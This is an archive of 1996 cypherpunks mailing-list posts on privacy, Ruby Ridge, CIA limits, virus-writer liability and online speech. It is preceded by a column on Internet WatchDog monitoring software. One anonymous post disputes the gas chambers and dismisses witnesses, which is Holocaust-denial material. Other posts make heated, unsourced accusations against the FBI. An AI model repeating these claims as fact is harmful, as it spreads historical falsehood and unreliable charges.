clever, creepy piece of software called WatchDog that  tracks every
move I make on my office or home computer.  Despite its name, Internet
Watchdog doesn't track just on-line activity; it keeps a log of every
program running.

The program was created by Algorithm Inc. in Atlanta, and is being
marketed by Charles River Media in Rockland.  I've run Internet
WatchDog on my home machine for about a week now, and I have only one
problem with the product --  it works.  It's a superb piece of software
that makes my skin crawl.

Blame it one experience.  Years ago, I worked at the US Postal Service
on an electronic mail sorting machine.  In those days, Postal Service
managers assumed that all workers were lazy and dishonest.  We were
constantly watched  through video cameras and two-way mirrors to make
sure we weren't stealing anything.  And computers monitored us at the
sorting consoles to make sure we put forth our maximum effort.

Programs like Internet WatchDog could bring some of that flavor of
paranoia to business offices all over America.  But David Pallai,
president of Charles River Media, says that's not what he has in mind.
Pallai's goal was a less intrusive, more efficient way to monitor the
Internet.

"We did not believe in censorship or blocking, " Pallai said.  Internet
blockers like SurfWatch or Cyber Patrol rely on lists of naughty 'Net
sites drawn up by a sort of Legion of Decency.  It's a job Pallai
didn't want.  Besides, so many new sites open every day that these
blocking programs must be constantly updated, and customers must pay
for the privilege.   "We decided that what we need is something that
monitors, as a telephone bill monitors calls, instead of blocking a
program," Pallai said.

Internet WatchDog is available in Windows or Macintosh formats.  It
starts whenever you turn on the computer.  You can switch it off, but
the program will tell your boss if you do.  The boss gets a password
that lets him or her read the information that Internet WatchDog has
filed away.

Internet WatchDog stores a log of every important computer event.  It
remembers when you turned the machine on, the name of every piece of
software you've used and when you used it.  Start up your Internet
dialer or a copy of Doom, and it's there.

Do you occasionally download photos from the Internet?  Don't save them
on your hard drive.  Internet WatchDog searches the drive and lists
every file in the GIF and JPEG formats, the most popular way to
distribute pictures on the net.  So keeping files with names like
NEKKID.GIF isn't a smart idea.

The slickest, spookiest part of Internet WatchDog is its automatic
screen capture.  The software keeps count of the changes in pixels -
the thousands of  tiny glowing dots on your computer screen.  If enough
of the pixels change, the program knows that some new image has flashed
up on your screen.

When that happens, it takes a screen snapshot, marks it with the date
and time, and files it away.  Even if you don't change screens, a
snapshot will be taken every 15 minutes.  Then the boss can see the
same images you've been looking at all day.

The program will save up to 10 megabytes of data - more if the boss
asks for it.  You can go back in time and see exactly what an employer
(sic - TT] was doing on his computer on 2:15 last Wednesday.

Internet WatchDog has only been on sale for a few weeks, but already,
Pallai has gotten lots of feedback.  "When I hear from the CEOs, they
love it," he said.  "When I hear from employees, they hate it."  I'll
bet.

Of course, employers aren't the only ones who can use Internet
WatchDog.  Pallai is also selling his products to parents and school
systems who want to monitor children's use of computers.  Indeed,
Pallai estimates that about 60 percent of his customers so far have
been parents and school systems.

Snooping on the kids is fine with me.  Children were made to be
monitored.  It's using this stuff on grown-ups that I don't care for.

Even Pallai isn't entirely thrilled.  To make Internet WatchDog a
little less intrusive, he tweaked some features.  For instance, the
program doesn't spy on you in secret.  It announces its presence when
it starts up.  Pallai decided not to include a feature that would
identify every Internet site you visit.  And there's no versions for
networks yet - Pallai's not sure he wants a network administrator to
look in on every worker's computer anytime he likes.  "We were trying
not to make it too Big Brotherish," he said.

But other firms are selling snoop software designed for network use.
Much of it was developed to ensure that workers aren't using pirated
programs on the job, but it can also be used to analyze every move you
make on your computer.  And the rise of the Internet has given
companies a big new reason to track corporate computer use.

After all, it's the company's machine and the company's time.  Your
boss has every right to keep an eye on you.  Still, it adds an
unwelcome hint of paranoia in a world that already has enough to go
around.  Soon, we may all be staring at our computers, wondering
whether they're staring back.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Wed, 24 Apr 1996 15:06:44 +0800
To: EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Rabbi Hier Testimony
In-Reply-To: <01I3VYLGPR4W8Y4ZTJ@mbcl.rutgers.edu>
Message-ID: <ElTIvnG00YUxMjiZxC@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 23-Apr-96 Rabbi Hier Testimony by
"E. ALLEN SMITH"@ocelot. 
>         People might want to take a look at Rabbi Hier (the founder of the
> Weisental Center)'s statements on "hate groups" and the Internet. While he
> (unlike Biden) does recognize that outlawing bomb-making information would be
> unconstitutional, he doesn't appear to approve of anonymnity on the Internet
> (nor, depending on how one interprets his statements, of encrypted
> communications without GAK). The first is to his (and the Weisenthal
Center's)


The Simon Wiesenthal Center and the ADL would love to outlaw anonymity
on the Net. Here's some info on their attempts to restrict online speech:

CDT report on Hier's testimony at Senate hearing last May:
  http://www.cdt.org/publications/pp130512.html
ACLU's *detailed* reporting on SWC's longtime net-censorship attempts:
   http://fight-censorship.dementia.org/dl?num=618
ADL decries "web of hate":
  http://fight-censorship.dementia.org/dl?num=1509
ADL research analyst's personal position on Internet hate speech:
  http://fight-censorship.dementia.org/dl?num=1600
ADL claims information is seductive, needs to be censored: 
  http://fight-censorship.dementia.org/dl?num=1727
IHR (biased) reporting on SWC/ADL net-censorship attempts:
   http://fight-censorship.dementia.org/dl?num=628
How ADL tries to recruit hackers to sabotage enemies' computers:
   http://fight-censorship.dementia.org/dl?num=856
SWC tries to muzzle critics in Argentina, Canada:   
   http://fight-censorship.dementia.org/dl?num=618
SWC exaggerates "hate speech" threat for funding and self-perpetuation:
   http://fight-censorship.dementia.org/dl?num=1311
   http://fight-censorship.dementia.org/dl?num=582
      
The EF Canada web pages also detail how the SWC has been trying to get
the Canadian equivalent of the FCC to regulate the Internet. The ACLU
reports at the URL above how the SWC has tried the same trick here in
the U.S.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 24 Apr 1996 17:06:24 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Re: Nazis on the Net
In-Reply-To: <01I3W57WCR2C8Y500P@mbcl.rutgers.edu>
Message-ID: <Pine.GUL.3.93.960423180035.15353B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 23 Apr 1996, E. ALLEN SMITH wrote:

> From:   IN%"richieb@teleport.com"  "Rich Burroughs" 23-APR-1996 17:19:45.60
> 
> >I'm sure it has been. That doesn't mean his report is untrue.  Is the
> >standard of proof the same for both of these issues?  We need proof to
> >establish that Weaver is a racist, but not to establish that the FBI
> >informant is lying?
> 
>         I require a higher standard of proof for worse accusations. I
> consider calling someone a racist a worse insult than calling them a
> liar. Furthermore, that this is an FBI _informant_ is a strike against
> the person to begin with in terms of trustworthiness.

Interesting. Thanks for explaining your terms. I disagree with everything
you're saying. :-)

I consider "racist" to be an ideological label, not an insult at all
(though personally, I find them sick and wrong). There's a lot of people
out there who proudly call themselves racists, at least in private. Many
of them I can have a civilized discussion with. For me, liar is a stronger
word.

I think it's good to keep the FBI informed, in general terms only. Keeps
the FBI from wigging out, you know. Self-conscious "infiltrators" and
especially "provocateurs" I would consider to be liars, but someone who
merely keeps the lines of communication open is a friend of mine. 

> >Separatist/supremacist...  I don't see much difference between them, and I
> >believe the former is largely just a cover story for the latter.  Weaver
> >is no hero, IMHO, though I believe the govt. fucked up big at Ruby Ridge.
> 
>         I don't approve of either separatists or supremacists; I just see the
> former as not quite as evil as the latter. Calling Weaver a supremacist is
> most common among the organizations that seem to believe that such actions as
> at Ruby Ridge are just fine, so long as they are against their enemies; it
> appears to be a public relations ploy (although the evidence is admittedly
> uncertain).

Who has defended the government's lies and shoot-at-sight rules of
engagement at Ruby Ridge? Please be specific. I think you're talking about
some straw man you read about in an NRA or militia pamplet. 

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 24 Apr 1996 12:42:45 +0800
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: EYE_suk
In-Reply-To: <199604231926.OAA26127@homeport.org>
Message-ID: <Pine.SUN.3.93.960423181900.10274B-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 23 Apr 1996, Adam Shostack wrote:

> |       security operation. At its heart will be an estmated
> |       3,000 Army troops, 6,300 National Guardsmen, and at
> |       least 10,000 other police and private security guards at
> |       peak strength, with an additional force of agents from
> |       the FBI, ATF, DIA, CIA, NSA and FEMA.
> 
> 	Isn't the CIA forbidden from doing anything on US soil?

Were that true they would have to move out of Virginia.

What you are refering to is the provision in their charter
(basically) forbidding intelligence activities in the United States.

The National Security Act of 1947 defines the duties of the CIA.  It does
so primarily in terms of "intelligence" or "intelligence relating to the
national security."  Legislative history indicates that the intent of
Congress was to grant a mandate for Foreign intelligence.  Consider also
the provision:

"the Agency shall have no police, subpoena, law enforcement powers, or
internal-security functions,"  50 U.S.C. section 403(d)(3).

It was contemplated that the CIA would be limited to foreign intelligence
operations and conduct very few of its operations in the United States.
The Agency was specifically permitted to be headquartered in the United
States and conduct what acts may be necessary to administer that facility.

"In public and private it was generally agreed among legislators and
representatives of the Executive that the CIA would be 'confined out of
the continental limits of the United States and in foreign fields,' that
it should have no 'police power or anything else within the confines of
this country,' and that it was 'supposed to operate only abroad.'"  Select
Committee to Study Governmental Operations with Respect to Intelligence
Activities, Foreign an Military Intelligence, S. Rep. No. 755, Book I,
94th Cong., 2d Sess. 136-139 (1976); See Also, Stephen Dychus et. al.,
National Security Law (1990).

The CIA has relied in past on section 102(d)(3) to authorize its limited
activities in the United States.  (Generally charging the Director with
the protection of sources and methods).

> 
> Adam
> 
> -- 
> "It is seldom that liberty of any kind is lost all at once."

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 24 Apr 1996 12:54:43 +0800
To: Scott Brickner <sjb@universe.digex.net>
Subject: Re: Bernstein ruling meets the virus law
In-Reply-To: <199604231954.PAA22836@universe.digex.net>
Message-ID: <Pine.SUN.3.93.960423183933.10274D-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 23 Apr 1996, Scott Brickner wrote:

> Bruce Marshall writes:
> >On Mon, 22 Apr 1996, Mark Aldrich wrote:
> >>  The term "virus" connotes a pathogenic quality in the mind of 
> >> many.  Unfortunately, this tendency continues in the use of the word 
> >> 'virus' within our community.
> >
> >    Personally, I can see many useful functions for viruses.  But I find the 
> >viruses that simply destroy data--which tends to be the majority--to be 
> >quite boring and childish.  A non-destructive and innovative virus is 
> >very interesting and comparable to any good software hack in my eyes.
> >
> >> While I understand that "intent" is something with which lawyers have to 
> >> contend when they defend or prosecute a case, I don't think that the 
> >> notion of intent to commit harm extrapolates correctly into the field of 
> >> virus writing. 
> 
> O.W. Holmes suggested out in "The Common Law" that the law delineates a
> certain minimum level of competence in forseeing the outcomes of our
> actions which all members of society are expected to attain.  We'll
> hold you responsible for actions a "reasonable person" should have
> avoided because of their danger.

With you so far.  (Though Holmes is by no means the litmus by which
today's legal world tests its process).

> As such, persons with limited
> training in manipulating biological viruses are expected to avoid doing
> so.  Individuals *with* training are expected to take adequate
> precautions to avoid their spread.  I see no reason why electronic
> viruses shouldn't be treated similarly.  If you're going to write them,
> you *better* take steps to prevent their release, or you are liable for
> the damages.

Now you jumped the argument a bit.  There is a difference in holding
someone to a reasonable standard generally, and defining several standards
based on the experience of the person to which the standard is being
applied.

This latter approach is often called (jokingly by some) the Objective
Subjective Standard.  (Objective standard being without consideration of
the view of the individual being judged, subjective including that view,
and object subjective being the consideration of what the general class of
individual would do without consideration of the individual's specific
view).

(What would a reasonable virus writer do is distinct from what a
reasonable Bob Dwyer, Ph.D. Computer science might do is distinct from
what a reasonable person might do).

Many courts reject higher (or lower- there are arguments for this 
too) standards of care for experts than for lay persons or other
non-experts in tort cases, prefering to impose the "reasonable person"
(Reasonable man for those of you who went to law school before 1985)
standard universially.

If there is interest, I will post exerpts of the arguments on both sides
of this issue with the header [Noise].


---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 24 Apr 1996 18:35:18 +0800
To: Rich Burroughs <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: [NOISE] Re: Nazis on the Net
Message-ID: <m0uBttS-000918C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:20 PM 4/23/96 -0700, Rich Burroughs wrote:
>On Tue, 23 Apr 1996, E. ALLEN SMITH wrote:
>[snip]
>> 	However, one reference in this report to Weaver's calling for a meeting
>> to oppose the "Zionist Occupation Government" does provide an argument for
>> calling him a racist of the anti-Semitic variety. On the other hand, the only
>> person claiming this is the FBI's informant; the truth of his statements has
>> been called into doubt.
>
>I'm sure it has been. That doesn't mean his report is untrue.  Is the
>standard of proof the same for both of these issues?  We need proof to
>establish that Weaver is a racist, but not to establish that the FBI
>informant is lying?

I see no contradiction, here.  Weaver's credibility, at least to his telling 
the truth, is apparently unchallenged.  The FBI, however, has been caught in 
numerous lies about Ruby Ridge, and the believability of its informants (at 
least, to the extent that the FBI itself can be trusted to relay their 
reports accurately) is highly in doubt.  

The government spent about $1.5 million to get a minor, first-time (alleged) 
criminal.  There is no obvious or logical basis for such extreme interest, 
even in hindsight based on what we now know.  An objective person analyzing 
this would have to conclude that the government's interest in Weaver was 
entirely different than what it was claimed to be, and if it was that 
important it is logical to conclude that fraud was not beyond their 
capability and motivation.  Given the fact that the 
government actually faked evidence in the trial (photographs of shell 
casings), a fact that was brought out during trial, anything they say is not 
believable.

Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 24 Apr 1996 18:33:21 +0800
To: Black Unicorn <jamesd@echeque.com
Subject: Re: 5th protect password?
Message-ID: <m0uBu6w-000951C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:59 PM 4/23/96 -0400, Black Unicorn wrote:
>On Tue, 23 Apr 1996 jamesd@echeque.com wrote:
>
>> At 06:19 AM 4/23/96 -0700, Sandy Sandfort wrote:
>
>> > didn't Unicorn offer Mr. Bell a 
>> > wager on this issue?  Isn't the ball in Mr. Bell's court to put
>> > his money where his mouth is?
>> 
>> Yeah:  fifty thousand dollars.  
>
>[...]
>
>> Now if Unicorn had proposed a bet for one hundred dollars, then
>> I would sit up and take notice.  A hundred dollars is real money.  
>
>US$ 100.00 it is.  Mr. Bell?

As I recall from a message a day ago, you claimed that you saw no way that 
we could come to any kind of agreement as to the terms and conditions.  I'm 
willing to accept your word on this prediction.

Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 24 Apr 1996 12:33:03 +0800
To: adam@lighthouse.homeport.org
Subject: Re: EYE_suk
Message-ID: <199604232323.TAA16732@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by adam@lighthouse.homeport.org (Adam 
Shostack) on Tue, 23 Apr  2:26 PM


>Isn't the CIA forbidden from doing anything on US soil?


Probably the CIA officers are linguists or analysts, maybe even 
cryptographers, who will be doing that they do at Langley and 
other US stations: processing foreign (non-US-citizen) 
intelligence coming into the country from a variety of sources.


These roles would fit this paragraph of the article:


   To keep tabs on such potential foreign threats, around 25
   CIA officers will be stationed alongside officers from the
   Defense Intelligence Agency the National Security Agency,
   and the FBI at an "all-source" intelligence command post to
   be established at an undisclosed location in the Atlanta
   area.


Any CIA officers or agents or contractors here want to comment, 
top secretly? We're all compartmentalized, yes?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 24 Apr 1996 12:52:29 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Re: Nazis on the Net
Message-ID: <01I3W57WCR2C8Y500P@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"richieb@teleport.com"  "Rich Burroughs" 23-APR-1996 17:19:45.60

>On Tue, 23 Apr 1996, E. ALLEN SMITH wrote:
>[snip]
>> 	However, one reference in this report to Weaver's calling for a meeting
>> to oppose the "Zionist Occupation Government" does provide an argument for
>> calling him a racist of the anti-Semitic variety. On the other hand, the
>> only person claiming this is the FBI's informant; the truth of his
>> statements has been called into doubt.

>I'm sure it has been. That doesn't mean his report is untrue.  Is the
>standard of proof the same for both of these issues?  We need proof to
>establish that Weaver is a racist, but not to establish that the FBI
>informant is lying?

	I require a higher standard of proof for worse accusations. I consider
calling someone a racist a worse insult than calling them a liar. Furthermore,
that this is an FBI _informant_ is a strike against the person to begin with
in terms of trustworthiness.

>Separatist/supremacist...  I don't see much difference between them, and I
>believe the former is largely just a cover story for the latter.  Weaver
>is no hero, IMHO, though I believe the govt. fucked up big at Ruby Ridge.

	I don't approve of either separatists or supremacists; I just see the
former as not quite as evil as the latter. Calling Weaver a supremacist is
most common among the organizations that seem to believe that such actions as
at Ruby Ridge are just fine, so long as they are against their enemies; it
appears to be a public relations ploy (although the evidence is admittedly
uncertain). I don't call Weaver a hero, either, but the most evil ones at Ruby
Ridge were the governmental types.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 24 Apr 1996 13:01:08 +0800
To: nobody@REPLAY.COM
Subject: Re: Nazis on the Net
Message-ID: <01I3W5EWYFRC8Y500P@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"nobody@REPLAY.COM" 23-APR-1996 18:33:53.11

[Neo-nazi holocaust revisionist bullshit deleted]

	My grandfather was among the people collecting the documents used at
Nurenburg, and among those organizing the documents in question that were used
in the trials. Look in the records for the Paris Documents Center, and you'll
see his name - William H. Smith. (He would have been a major or a lieutenant
colonel at the time, I believe). Anyone who tries to deny that the Holocaust
happened - by which I mean that the Nazi government, probably with the
complicity of the German people, comitted mass genocide, rape, and torture - is
a fanatic, a moron, an ignoramus, or some combination of the above. It would
have been better if the atomic bomb had been ready in time to use against
Germany and Stalinist Russia.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (CyberiaLON_5)
Date: Wed, 24 Apr 1996 11:37:52 +0800
To: cypherpunks@toad.com
Subject: Text-based Steganography...
Message-ID: <199604231854.TAA18197@easynet.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


        
I'll be giving a talk on text-based Steganography this Friday at the
Newton Institute in Cambridge, England. 10 am. The talk will
discuss how to disguise data as innocuous looking text for all
of the usual reason one wants to hide something. 

-Peter Wayner





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 24 Apr 1996 07:55:52 +0800
To: cypherpunks@toad.com
Subject: Re: Nazis on the Net
Message-ID: <199604231853.UAA04047@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



E. ALLEN SMITH writes:

| (one reason for Hiroshima and Nagasaki being right
| was the Japanese alliance with Germany)

Was Dresden also right? (more died than at Hiroshima)  The firebombing
of Tokyo? (10% died in one raid).  Stalins execution of his own people?
Look at facts, not propoganda, before coming to such conclusions.
The conventions of war (namely the aim of keeping civilians out of it,
along with good treatment of prisoners) evolved over many centuries,
but then come the Brits and the Yanks to destroy it all with their
indiscriminate bombing of civilians, using the "they can stop the
torture simply by surrendering," and "those bombs saved countless
[American/British] lives!" excuses, and directing attention away from
their own attrocities by spreading propoganda such as soap made from
Jews.  Then to direct attention away from themselves even further, the
victors judge the defeated at Nuremburg for "war crimes," when the
accusors themselves were guilty of terror bombing, the worst war crime
of them all.

| and the Holocaust (people who claim
| it didn't happen are calling my paternal grandfather a liar).

Does anybody really claim it did not happen?  I doubt it.
I assert that those who express doubt over details of the current
story (such as the numbers that died in the camps, the existence of
gas chambers, or whether Hitler gave an order to systematically kill
Jews) are referred to by the media as saying that the Holocaust didn't
happen, but that is *not* what they are saying.  With regard to your
grandfather being liar, that is hard to say without knowing precisly
he has said, but if he states that, eg, Dachau was a terrible place,
riddled with disease and starvation and terrible conditions, and
hundreds of thousands of people died, then who would disagree with him?
If on the other hand he asserts that he saw gassed Jews at Dachau,
then he is mistaken (although not necessarally a liar.)

---
The Nuremberg Trials...had been popular throughout the world and
particularly in the United States.  Equally popular was the sentence
already announced by the high tribunal: death.  But what kind of trial was
this?  ...The Constitution was not a collection of loosely given political
promises subject to broad interpretation.  It was not a list of pleasing
platitudes to be set lightly aside when expediency required it.  It was
the foundation of the American system of law and justice and [Robert Taft]
was repelled by the picture of his country discarding those Constitutional
precepts in order to punish a vanquished enemy.
                U.S. President, John F. Kennedy







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 24 Apr 1996 14:15:06 +0800
To: Amos Elberg <aelberg@wesleyan.edu>
Subject: Re: PEP Announcement (fwd)
Message-ID: <v03006600ada332adbb79@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


Hey, Amos!

Talk to me about using your spiffy chain-remailing script button with the
new Eudora...

It asks me for a directory in an open box now, and urps...

Cheers,
Bob

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"If they could 'just pass a few more laws',
  we would all be criminals."    --Vinnie Moscaritolo
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Wed, 24 Apr 1996 17:57:41 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: [NOISE] Re: Nazis on the Net
In-Reply-To: <01I3VQJGR4JK8Y4Y01@mbcl.rutgers.edu>
Message-ID: <Pine.BSF.3.91.960423215115.11936D-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain


> 	I assume that you are thinking I'm incorrect? Incidentally, I classify
> a racist as someone who says "this race is evil and should be
> killed/enslaved/tortured/whatever." Someone who says that different races
> shouldn't live together is a separatist; it's only when they start having
> seperate but equal being anything but equal (e.g., apartheid) that it crosses
> the line into racism. Thus, I don't regard Charles Murray or Richard
> Herrnstein as racist, for instance.


I'm typing green letters on a black background. All you people with black 
characters on a white background should go talk on another 'net.

Think about it.

- r.w.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Wed, 24 Apr 1996 17:09:55 +0800
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: EYE_suk
In-Reply-To: <199604231926.OAA26127@homeport.org>
Message-ID: <Pine.SOL.3.91.960423221718.19976A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 23 Apr 1996, Adam Shostack wrote:

> 	Isn't the CIA forbidden from doing anything on US soil?

That'd make cointel a little tricky :-) 
Simon
---
They say in  online country             So which side are you on boys
There is no middle way                  Which side are you on
You'll either be a Usenet man           Which side are you on boys
Or a thug for the CDA                   Which side are you on?
  National Union of Computer Operatives; Hackers, local 37   APL-CPIO





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Wed, 24 Apr 1996 17:00:25 +0800
To: Rich Burroughs <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: [NOISE] Re: Nazis on the Net
Message-ID: <199604240516.WAA10983@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 02:20 PM 4/23/96 -0700, Rich Burroughs wrote:
>I'm sure it has been. That doesn't mean his report is untrue.  Is the
>standard of proof the same for both of these issues?  We need proof to
>establish that Weaver is a racist, but not to establish that the FBI
>informant is lying?

I have read that we already have proof that the FBI informant lied on
numerous matters.   I am not familiar with this proof, but it is 
consistent with the other facts surrounding this incident.

Let us put this in its proper context:  The FBI murdered Weaver's dog, his
wife, and his son, and did their damndest to murder Weaver.  They shot
his wife while she was holding a fully loaded assault baby in her arms.

They lied about this extensively on oath.  The judge and the jury rejected
their story during the prosecution of Randy Weaver.  Later, 
when inconvenient facts came out, they pleaded the fifth amendment.

Give a dog a bad name and hang him.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 24 Apr 1996 16:54:34 +0800
To: cypherpunks@toad.com
Subject: "You have been deleted"
Message-ID: <ada2fe6f030210045e74@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


Moroni worried:
...
>Date: Tue, 23 Apr 1996 15:24:36 -0400
>From: Mail Delivery Subsystem <MAILER-DAEMON@locrian.scranton.com>
>To: moroni@locrian.scranton.com
>Subject: Returned mail: User unknown
...
>   ----- The following addresses had delivery problems -----
>tcmay@got.net  (transient failure)
>
>   ----- Transcript of session follows -----
>tcmay@got.net... Deferred: Connection refused by mail.got.net.
>Warning: message still undelivered after 4 hours


Theory 1:

While working through the examples for Day Eight of "Teach Yourself Java
for Macintosh in 21 Days," I accidentally created a rogue applet which
enabled a virus developed in Bulgaria to enter my system. From there, it
infected several other computer systems, including a Sony PlayStation, a
Foonley, and several Exidy Sorcerers. Service to Northern California is
only now being restored.

Theory 2:

The Men in Black finally had enough, especially of my theft of their domain
name (Blacknet). At 9:09 a.m., PDT, Clinton's black helicopter detoured on
its route and landed on my hill, abducting me for medical experiments I am
too embarrassed to describe (except that Chelsea was also involved). I am
back now, albeit subtly changed (for the better).

Theory 3:

My ISP, got.net, had a router failure on its "ZNEt" link to the outside world.



Take your pick. Or maybe we should vote? The social construction of
reality, and all.

Alas, sometimes the truth is too banal.

--Tim May






Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 24 Apr 1996 17:38:10 +0800
To: cypherpunks@toad.com
Subject: Re:  Golden Key Campaign
Message-ID: <ada30736040210046e87@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:53 PM 4/23/96, Hal wrote:

>effort.  Note that RSA's logo is a key, and we see the RSA key at the
>bottom of our Netscape screens all the time.  I don't remember if it's
>golden.
...
>I have not actually seen the new logo because I don't have a graphical
>browser here, but I hope it is not too similar to RSA's key.  I hate to
...

The "Golden Key" appears to be a photograph of an old-style "skeleton key"
(hope this is not symbolic of what happens to users...). The key sits on
top of an envelope in the image I saw.

The "RSA Key(s)" is/are modern keys, a la Schlage or similar lock keys.
They normally are shown in a kind of gold/yellow/bronze, from memory of RSA
literature and a Web page I just looked at to double-check.

I don't know if the use of a key is to endorse RSADSI directly, or
subliminally. But there are not a lot of symbols which are evocative. The
"Cypherpunks rose" hasn't exactly become the new symbol of whatever it is
we believe in, and other symbols are no better.

I note that that the NSA also uses a key in its logo.

(On the larger issue of the campaign itself....I'm not much of a joiner,
and PR campaigns fatigue me. I'm with Whoopi Goldberg on the Blue Ribbons,
the Red Ribbons, the Yellow Ribbons, the Green Ribbons, the Gold Key, the
Silver Key, the Chartreuse Diskette, and the Maltese Falcon.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 24 Apr 1996 15:12:52 +0800
To: jim bell <jimbell@pacifier.com>
Subject: [Wager: Seeming Resolution]
In-Reply-To: <m0uBu6w-000951C@pacifier.com>
Message-ID: <Pine.SUN.3.93.960423230132.343B-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 23 Apr 1996, jim bell wrote:

> Black Unicorn wote:
> >  JamesD wrote:
> >> Now if Unicorn had proposed a bet for one hundred dollars, then
> >> I would sit up and take notice.  A hundred dollars is real money.  
> >
> >US$ 100.00 it is.  Mr. Bell?
> 
> As I recall from a message a day ago, you claimed that you saw no way that 
> we could come to any kind of agreement as to the terms and conditions.  I'm 
> willing to accept your word on this prediction.

I note for the record that I never predicted that the terms and
conditions would be complex or unresolved, but that you would alter
the claim and the logistics of the wager to the point where you might
evade the consequences of loss.

I note for the record that it was your post that originally supported its
accuracy with a call for wagering.
